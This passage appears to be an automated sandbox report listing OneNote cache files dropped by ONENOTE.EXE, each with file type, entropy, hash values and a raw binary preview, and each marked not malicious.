Preview:	2...>...........v.......H ...!..2...>...R...,...v.......@.... ...........................................................................................................................................I.......I.qk..B.....LZ....<......-......./Q.....-......./Q.......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............._..t...<<..........N...^.................jbp..E..F.}..............P...............................4....I.qk..B.....LZ............._..t...<<......................................................................................................j.......T.q..............].....H....... .@.....$........d...............;........4...4...4..............z.......R......................7............S.y.m.b.o.l.......................'...%.....z...,4. .......$>........4..p..7........................................;........4...4...4

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
Category:	dropped
Size (bytes):	27862
Entropy (8bit):	7.238903610770013
Encrypted:	false
SSDEEP:	384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
MD5:	E62F2908FA5F7189ED8EEBD413928DEE
SHA1:	CA249B4A70924B73BDA52972E9C735AEC35A0C5D
SHA-256:	20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
SHA-512:	EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..\|.Q..I.&.. ......"T4)wdH.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	5.327274216210832
Encrypted:	false
SSDEEP:	384:cV15MA3llrhQnukdYdz4ajWTKtuJyNHDfHvWSYZE03Xgsnyw/CxZ/YCOiDrFIt:cVvlslK6/q5cXF0Ut
MD5:	2994ACFF2D419658E758784F88A6A7F6
SHA1:	E814E434A4D1D417D5FCF22DFD4083FC8787000B
SHA-256:	E4C3866F38150FFD249D29851972FFE83E0E8844E0C5ADB2501C49BD6FB2DEFB
SHA-512:	049F699FF67CCA4EAF63057B00C0956226DC6AB5B58AB56354004AB6ECA77A85898982674FD9D1BB985E60120D7480C0297B1535B937425A8D72F2E9FC11EDAD
Malicious:	false
Preview:	...@....0...........H...0@..0 ..@L.........@................d....J..0 ...K.................................................................................@.....................J..0 ..`K..............9.......9...&.A..).1..#.1)......1).i.[.5.P...i.hD.GE6.?..gU'..hD........6.....n.....r.w.7..!LKN'....r..........hD......hD..................................................9..T!...W&.T%......T.....-.T.k..../T.'..a.BT......GT.....nLT.............0...........e....4.........................Ap.H..@.AFJy.k.....(.....x.....(...(...B.a.c.k.g.r.o.u.n.d. .-. .O.r.a.n.g.e...j...P.a.g.e.L.o.c.I.D...L.o.c.V.e.r...P.a.g.e.V.e.r.C.o.m.m.e.n.t...P.a.g.e.O.v.e.r.i.d.e...P.a.g.e.N.a.m.e...2...0.0.0.2.4...1.....0...U.n.t.i.t.l.e.d. .p.a.g.e............=i9.J....\............I...N.3f.....2.......R.......t...............9.......0A..W&.......1).../...............0...........e....4.........................A..:4E.2..p1......(...`.i.....(...(...B.a.c.k.g.r.o.u.n.d. .-. .Y.e.l.l.o.w...j...P.a.g.e.L.o.c.I.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.097213189501563
Encrypted:	false
SSDEEP:	96:0sFv/icNl9MEaumXG9P8aT3RLQX/MZYWK:0sFv/ichpaumXG9djRLQX/MZYW
MD5:	B1AA5296D30C0C770D5D69539BE27BF0
SHA1:	4BA9E73748A821FB1DABC6302D2D563DF2AC63BF
SHA-256:	1F2DF0D67AFB4861F3E17E22D12E1770E56BB95A05149982CAF5F0356B370340
SHA-512:	82CCB8DCF16DA81035AD0AA652F2834AF2538D4C00F40ECC91EE7135A4CEA815C6C1221F0DACC7F40A5E0034812BC0FA2A9C0C7D769AB4D73F9D5132711B6F95
Malicious:	false
Preview:	2...>....... ...v....................................................?....?.............................................................................2...>.......\|...v...H............................I.......I.qk..B.....LZ.6@......6@.8J=.-p..HV...6@.8J=.-p..HV...6@..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............x...#..'$..........N...^.....................f@...h.o.i........f........................................I.qk..B.....LZ............x...#..'$..............x...#..'$................6@......6@......6@..........................................6@j.....6@T.]...6@......6@..B...6@H.....6@..B...6@..>.).6@..J...................;........4...4...4.."...............6@..6@..6@..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........6@......6@....#.6@............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.079507955379479
Encrypted:	false
SSDEEP:	48:+Rsskszqq77LctJt9iEfmPX3E9irVTo8rdqrslI1dXN5DOkz7/b4a:+Rss9J77LcZ9iEwX09i5TtRyNHM6M
MD5:	940430C3A804ED4D51CF98B120A77BF3
SHA1:	FDE5FE60315C25515FCBFAF727B8F37DAA3E7B01
SHA-256:	F4E8E4255FB6F4147984A87AF6E029DA75010F0A2E473748E5D91CE018578A59
SHA-512:	40FE63F5361B7418E120C118AA6EAC0A64F086BE5B20CB3AFC8A50D4C57DDC600B5348625324A46DB01D270FE688CDBECED14B64FE3A8917ACB040E614848EAF
Malicious:	false
Preview:	2...>.......&...v.......................................................................................................................................2...>...........v...N............................I.......I.qk..B.....LZi#......i#.n.Z{..WU.o@j%i#.n.Z{..WU.o@j%i#...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............[.m0.1.%P.........N...^...............!i2Y.Y.A..$.D.........f........................................I.qk..B.....LZ............[.m0.1.%P.............[*.m0.1.%P..............i#......i#......i#..........................................i#.j....i#.T.]..i#......i#...B..i#.H....i#...B..i#...>.)i#...J...................;........4...4...4.."..............i#..i#..i#...z...y.. x.. ...........$........4......7...7........................;........4...4...4.........i#......i#.....#i#.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.065427618780622
Encrypted:	false
SSDEEP:	96:fXpsusymS40tv8V9E3oXbc94VT9RiSVEym4a0Sek:xsY4UvDYXbc94VpRiSV
MD5:	907494CF7ED1EE69FEC530603E7D8131
SHA1:	D4AF5A8402273D74B1EDA0170EDC5C97B33AFA8E
SHA-256:	4C2CFFE4DF18DAA6D1FABD53ECF70DF2FCEB81F4FF50B8E1CFBEA596E0D542F6
SHA-512:	B33DAA9023986B8D4F2121A0A68DC6B73E7A70102913B895E5CAAFA1EAD59507FEF918809619DE9C333E0BFBD73C999A3B7390D654A3181D8BEE3D53465454BD
Malicious:	false
Preview:	2...>.......$...v.......................................................................................................................................2...>...........v...L............................I.......I.qk..B.....LZLh......Lh..+pC........Lh..+pC........Lh...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............f.....1u.!..e....N...^................\'..u.O....o.........f........................................I.qk..B.....LZ.............f.....1u.!..e.........f.....1u.!..e.........Lh......Lh......Lh..........................................Lh.j....Lh.T.]..Lh......Lh..B..Lh.H....Lh...B..Lh...>.)Lh...J...................;........4...4...4.."..............Lh..Lh..Lh...z...y.. x.. ...........$........4......7...7........................;........4...4...4.........Lh......Lh.....#Lh.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.039701554034713
Encrypted:	false
SSDEEP:	48:/psV0HtBQ51Yt+DEEl5Xk9884Toirdnrc/I0MdXHpAHKHBlFHmlHxHKHhdHvHeg:/ps+e1YvETXk98TTHRrcQtfTI
MD5:	E94C8824D0F80A9847F422736140CA3B
SHA1:	282DCA6D719B9969A6576232F40CAFD39CB5514F
SHA-256:	31373C03037B87896ED479FE2BC862523AD345659FB8EEDC13FAA960AE5CB3C5
SHA-512:	867047CF7DFF98A75359536C317CCDC8C543D662E507DFD491934C125ED7C7607159321BC1D7ED4E0FF771F25971A518F564FC8195B9A5A04EF97957F22ED922
Malicious:	false
Preview:	2...>.......$...v.......................................................................................................................................2...>...........v...L............................i.......i.}$6....e7<2./.I.......I.qk..B.....LZ.i.}$6....e7<2./.i...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............?..!..!,...6_.....N...^.................Q..RzD.]\.Bj..........f........................................I.qk..B.....LZ.............?..!..!,...6_..........?..!..!,...6_...........i.......i.......i...........................................i.j.....i.T.]...i.......i...B...i.H.....i...B...i...>.).i...J...................;........4...4...4.."...............i...i...i...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........i.......i.....#.i.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.052381227056883
Encrypted:	false
SSDEEP:	96:+8BsvseF8sCAEHOXo9sST4RyzSXo1XmRoOOrh:+8BsvLF8FdHOXo9sSURyzSXo1XmRoDr
MD5:	410EA42562945206AA2F25F1023D67FF
SHA1:	5C8DBF60B858F6D1AE4FFC6B657F45634FA6D8D3
SHA-256:	545ECB77E90AC9D40ACA9BEF56CAD896F4EF7FE6F40A09FE1A370EAE8A145DD1
SHA-512:	54E489AE5DB568E66CCF465101BEFA5F93A4AC0073CA60BAE25C4F4C4264420E90A0F99E711223B9B9D4E14382F3F5C340C2A92E5FB6D4E33E5A7A780726A3AF
Malicious:	false
Preview:	2...>.......$...v.......................................................................................................................................2...>...........v...L............................I.......I.qk..B.....LZvs......vs..Z...?..]n..vs..Z...?..]n..vs...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................6....Ml.N.....N...^....................C..F ............f........................................I.qk..B.....LZ................6....Ml.N.............6....Ml.N..........vs......vs......vs..........................................vs.j....vs.T.]..vs......vs...B..vs.H....vs...B..vs...>.)vs...J...................;........4...4...4.."..............vs..vs..vs...z...y.. x.. ...........$........4......7...7........................;........4...4...4.........vs......vs.....#vs.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.091589447460024
Encrypted:	false
SSDEEP:	48:Ypsl8Ud3XW90+tHW2EEfXE9Ua3IToPrdDruI0dXgsIR1ajFEok:asNW9dTEeXE9NITGRPUg
MD5:	1A712B77CCC5D262D8C2731F7489C803
SHA1:	2E4C115BBF280DCDE0223EAED8E3F0880A20C897
SHA-256:	9C3C6AEEA6FFA02DA9EF2D2349689B3D81B0BB6C978B6D5973989E24E021B878
SHA-512:	40A0C75BA07861822E8C697999A313612C14D637DF364119D995A17BB2140073801889AA89AFF44F5B1BC099A616ECBBA133C99775B22FDE186418C19A9CCC96
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ.............;....D........;....D......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................7uzv..j..........N...^................p?$s..F................f........................................I.qk..B.....LZ...............7uzv..j.................7uzv..j..........................................................................j......T.].............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4......7...7........................;........4...4...4......................#..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.098803473145921
Encrypted:	false
SSDEEP:	96:iJs6MkUWjNiMEYkwXbw9ZlTxR2Wj5UJc1uMF1r:ys6PjOYkwXbw9Zl1R2WjEit
MD5:	4FF4907877F97694B4AC8B17492BD256
SHA1:	818E256EA67CDB7FCEA3B8643AC00A46C7D3519A
SHA-256:	B2BA9F0DA0B5D9115842007798726589E52C269211511FC0E873AC60531EAEFB
SHA-512:	4E9FC2F0788B896498CC7040CC01C1B27BC192A5CCC69929E366A122A2B2527801154E9B4936E87A72DF642FF4127A80681B6F12E7798B92F70070769F4635D5
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ.l......lk.....X....G(.lk.....X....G(.l..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............'..^....3...,.......N...^..................+..=G.H..S...........f........................................I.qk..B.....LZ............'..^....3...,...........'..^....3...,.............l......l......l..........................................lj.....lT.]...l......l..B...lH.....l..B...l..>.).l..J...................;........4...4...4.."...............l..l..l..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........l......l....#.l............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.068799285383755
Encrypted:	false
SSDEEP:	48:YpsSwX0xEKObTtGjKEn6rdXY9i6UTToHrdvlxr2dIM/dXU9RAOxF:qssiKOPbEIXY95UTTeRHy/s
MD5:	771A6A71BAF2DC57CBDFFF6D41F822E9
SHA1:	20E177E4F348D36BA13E578BDCD4D7E0052A8D68
SHA-256:	B3E638AFB0D6CFC02EFD9B6566F6E694FBE29C79B51768E2DDD09CA49D3CD276
SHA-512:	F846B3C5FC072EF7587128360A58DC211B36A93D47EE05E1F700F84D468CE65038EE6A05FB0591FAE7650B86E2E8BFCC82212A79260005B480A9681AE1981624
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ.[e......[e9.i...H:K... .[e9.i...H:K... .[e..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............3.#.......#.M.~(....N...^...................Q>M.e..+...........f........................................I.qk..B.....LZ............3.#.......#.M.~(........3.#.......#.M.~(..........[e......[e......[e..........................................[ej.....[eT.]...[e......[e..B...[eH.....[e..B...[e..>.).[e..J...................;........4...4...4.."...............[e..[e..[e..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........[e......[e....#.[e............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.092435552555433
Encrypted:	false
SSDEEP:	48:Y9sVXo1lvM+Smtnu7tkEXgZkXA9Ww9fLkfToTrdPrhIsLdXgJR5ldJN:+sge+Sm8GEXgSXA9flLkfTiRjVLoJ
MD5:	A5FA06B56773EFA209F01051D4CE49AF
SHA1:	E01E1A7DE23B6862E404CA0894286007448EF971
SHA-256:	96B654482B6FFDCD2D6ECD240D0A39F577E3AB6D173B4CA7280A2AD9008ADFEF
SHA-512:	9FDB5BD5A2BBAABCF220CD2484A1D091434F378824B6514CC8884CAEFF0F3BFFABA1B220DD2D109D580CCA2458DB760B2EA9C7B11563BB22EB39F95FDA1317EC
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ.a......ag.`..<.......ag.`..<.......a..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............%.=.7@....M.-.,....N...^................T..F..[...U.........f........................................I.qk..B.....LZ.............%.=.7@....M.-.,.........%.=.7@....M.-.,..........a......a......a..........................................aj.....aT.]...a......a..B...aH.....a..B...a..>.).a..J...................;........4...4...4.."...............a..a..a..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........a......a....#*.a............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.066169166067219
Encrypted:	false
SSDEEP:	48:YBsT60x46tEdWE8CXc9m+TqTodrdQryIOdXuBRPUi2O:is/x46fEjXc9m+TqTwRISC2
MD5:	DB6E2A9DE7F687E1F788D2113D9C2999
SHA1:	513A19B9A22181C8035A8B402A4CBE8109B93068
SHA-256:	732EBAF0C40B1451EE7FD53E947969C60E4CA21BCA101B6B9363ACA4BE9D0482
SHA-512:	965C2A1478CC8062399F4F6DF1485C89BBF4CDD5963D816615D2DE1866B8280B72D3326B215D426ACAA2A5A0A5A2481326ED96D0F3557D7C99F422B93543B2AA
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ.:p......:p.D7H...v+8....:p.D7H...v+8....:p..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............HY.L.j....j.D.F?....N...^...............m.!W#..I.....a1........f........................................I.qk..B.....LZ............HY.L.j....j.D.F?........HY.L.j....j.D.F?..........:p......:p......:p..........................................:pj.....:pT.]...:p......:p..B...:pH.....:p..B...:p..>.).:p..J...................;........4...4...4.."...............:p..:p..:p..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........:p......:p....#.:p............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.0412965132382235
Encrypted:	false
SSDEEP:	48:YFsDoNAgOYQOa+tWmELh9lXo9BnmTolrdP7rZmIqdXW5RDOU7HZ/l:2suQT+bEflXo99mTMRf4C
MD5:	232C2051063C288962D4838AAC1A7CEF
SHA1:	BEAB37963337454DD78F0E83C464D09CD2A82017
SHA-256:	A93FAF34FB83CFF62D175647F64D078A55FC8CD79FD70DA7586BF1E45E6A4D0B
SHA-512:	879B944D876921D3D3477EC2B8D56055DDD1ECF619676F71B8C1C9EEBF24E547F3A25B03DAFB60FB0545C617DC731DF51098CE44981216F4E6963B44FDEBCE78
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ\|.......\|...........J..\|...........J..\|....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..................hs..u..........N...^...............]8.v`2.B.>.y..lf........f........................................I.qk..B.....LZ.................hs..u...................hs..u...............\|.......\|.......\|...........................................\|..j....\|..T.]..\|.......\|....B..\|..H....\|....B..\|....>.)\|....J...................;........4...4...4.."..............\|...\|...\|....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........\|.......\|......#\|..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.088205386083752
Encrypted:	false
SSDEEP:	48:Y6S7Ds4tKL68KthsWEFnHsX/s9hnkTo7rd2trgIwdXAdRioGQ5:0Dsn23jEFMXU9hnkTWReGur
MD5:	0DE5B7FE8841246918EEFB4733DA72B6
SHA1:	F157454487D99308A45D738FE1D31CB40E9E6C02
SHA-256:	727A45B183F4ACA3F2FFC0DAD1452680400AB15FA092D1DC13941A2CA55E17F6
SHA-512:	8CB9D7611102B85B946562D48C5A6A16B89C90328921148F1984C45FE9BDCD5F04AB69AF07446FE4EC3A37FCF2E82CF302C1298F3E49773241A144777DFCA09B
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J......................................\|>o..;7.......I.......I.qk..B.....LZ...\|>o..;7...........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............K.N_..@7&..H.....N...^................u..\.E.k..............f........................................I.qk..B.....LZ..............K.N_..@7&..H...........K.N_..@7&..H.........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.094929992227166
Encrypted:	false
SSDEEP:	48:lsevWOcrtptsEtlX5m9LqyTodrdfokr5I+dX6+kuUwa:lsYcrZsEHX5m9WyTMRfHL7uw
MD5:	917CFFBE6A034708E232D50C05DA53C6
SHA1:	DB79B1DA9AC178B39F7EB2675E04BCF972F4B8E0
SHA-256:	8703DACC9A87F03FA3E885A6C20185BC97C0F8AD30E117B760A7F6F293C2440C
SHA-512:	F28F734374CC1E5FEFC341C5A92DBB86B357156D0908D6D4ABBE8045F0C9AF1E2B3615157566E00ACABB62B673F33633C99FDAC53E858E44737E1ECC587550E4
Malicious:	false
Preview:	2...>.......&...v.......................................................................................................................................2...>...........v...N............................I.......I.qk..B.....LZ.2......2m...;K.nCo.2m...;K.nCo.2..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............5....K.$C..........N...^...............s..?..UK..'S;.~.........f........................................I.qk..B.....LZ.............5....K.$C...............5....K.$C................2......2......2..........................................2j.....2T.]...2......2..B...2H.....2..B...2..>.).2..J...................;........4...4...4.."...............2..2..2..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........2......2....#*.2............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.097697147336174
Encrypted:	false
SSDEEP:	48:tsw7D+oK7S2tCxmtgEno3tL8XbL89y1A8XTocJrdlrqITdXN+kwSEa:tsm12k+gEKAXbA9YA8XTJJRp3OuE
MD5:	F6048B2D0E0F04F60041A841C3BE227F
SHA1:	035E207C6F106052CEB4BE3D80459F81CF0B4054
SHA-256:	DB7888379EB8B908B24B4429C200CA98DBCBEF4CA3DA14A5BAD57114DE424EF8
SHA-512:	28641C8B602408BCF3838AD42E3500D3D7AECE8A166BEE128C607CF96C4FBC9EA2C4769793E4A9AB009C22B3932BA8E616E74487EABBC03B63302A9A4DEAC5A4
Malicious:	false
Preview:	2...>.......&...v.......................................................................................................................................2...>...........v...N............................I.......I.qk..B.....LZDw......Dw.m%l..:.....J?Dw.m%l..:.....J?Dw...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............G......N.8&.......N...^................F.\|Xe.H...X.@u........f........................................I.qk..B.....LZ.............G......N.8&............G......N.8&............Dw......Dw......Dw..........................................Dw.j....Dw.T.]..Dw......Dw..B..Dw.H....Dw...B..Dw...>.)Dw...J...................;........4...4...4.."..............Dw..Dw..Dw...z...y.. x.. ...........$........4......7...7........................;........4...4...4.........Dw......Dw.....#Dw.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.096505730011047
Encrypted:	false
SSDEEP:	48:1s3FmhGnS+mt0TrUfdt4EdsKXdK9SCF7ToNxrddrfIZqdXo+k7/Ma:1sMyS+mtf34EJXg9SCRTSRRzJOM
MD5:	E105BFDFFAA6B30869A26550A93D260D
SHA1:	7AAE67A907B257F52D878F1B8BF103B51C7BFC4B
SHA-256:	2BDDE3741FBA77033C4913ADFF754DF85EDB7B6B2CEA8DE79E2E0FA94B68EB53
SHA-512:	3FB58A71DDFB749896B4E3979F4D19AAE9E57B506052EBBB9867372190849EB60A7A2B4DC6383D6E6136BAC7F23635086E4B4DAC05CD6A7F5BA945FAA4AAC619
Malicious:	false
Preview:	2...>.......&...v.......................................................................................................................................2...>...........v...N............................I.......I.qk..B.....LZ...........8T.y....Y.MN...8T.y....Y.MN.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............3r..51....{.EZs.....N...^................b...$B.}...!h.........f........................................I.qk..B.....LZ............3r..51....{.EZs.........3r..51....{.EZs.........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000019.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.148702149222483
Encrypted:	false
SSDEEP:	96:QddsrLcpDZS0E9EaXk9ZjTTRv3QUc9DRxrXA:QddsQFS4aXk9ZjvRv3
MD5:	FFB8CC5F3980D336DF1B46145F98D3D9
SHA1:	DD23B8C2FB9B9655F24CF98307B7D7C3EF7B2058
SHA-256:	E3D0E6D637100FCD8E6F82663AA81D2A09357A27DBEE126BAD9430A23F9321AF
SHA-512:	4D2FF5540C33D60B0E6D56506D02DE0B155677EDBCF231A9FBCD171A2458C7956A80F5B7866992C7724CA84CA91CBEABD3684F8C7DE77E83821E46C73C6A5436
Malicious:	false
Preview:	2...>.......0...v...$.................................................?....?............................................................................2...>...........v...X............................I.......I.qk..B.....LZ...........c..b..^...z....c..b..^...z......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................Z......ys......N...^.................H..3H..$............f........................................I.qk..B.....LZ...............Z......ys.............Z......ys.*.........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001A.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.1674025146670814
Encrypted:	false
SSDEEP:	48:+s3S7HIyXKtbttUEPlOBXk9Q8fToFrdQrSnhIp/dXXzkNuBig:+s8oyXKpUEPsXk9zTcRIK6/su
MD5:	5A28992181DFEFD180CB0A8624A3761F
SHA1:	E3793898D2F6EB8F4766D559AF631367CF9C789C
SHA-256:	22CA3ADCF8D699E7CA54D70FD7D0E747A469BA50696DAD199EC2C682F0C1C363
SHA-512:	D7370336F1006B7F66E01183FE0991E51AC8C50BF50B150E019EFE5B640BB6CF5B2F1BBF21EC55A47DC6CF037D3D687E03E82882567C36B268E79CCFF66B8D53
Malicious:	false
Preview:	2...>.......0...v...$.................................................?....?............................................................................2...>...........v...X............................I.......I.qk..B.....LZ............!.;D...........!.;D..........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............$gb.{...#..aT....N...^...............d.... C..5.y\.........f........................................I.qk..B.....LZ.............$gb.{...#..aT.........$gb.{...#..aT....................................................................j......T.]............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4......7...7........................;........4...4...4......................#..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001B.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.143638005615839
Encrypted:	false
SSDEEP:	48:Qesyc/hdmxmVBtg5+EBAC+reXs9P+ToeEJrdSrwIwdXYy9RI+:FsZkxmVBFEBA7iXs9mTr6RKWb
MD5:	68F63BB852654DE13BF0C16A7169D8E6
SHA1:	19F087F3CFCD87D9E32C411871C7B4BF8C66BBC0
SHA-256:	6693170C35EEF7DF02A68764DD11A0120F2A9F80349CA5FDA5D4F66A092EE4F3
SHA-512:	3B4A0E7897BCFC2B4EFD4EC4C263C1F8883024BBBCBEF73E0F702DBDB6A219C6EDB1B575880B7CE16FA472F80C1FA6F6A5B8BEF747B36ADE0412C59A89B6907C
Malicious:	false
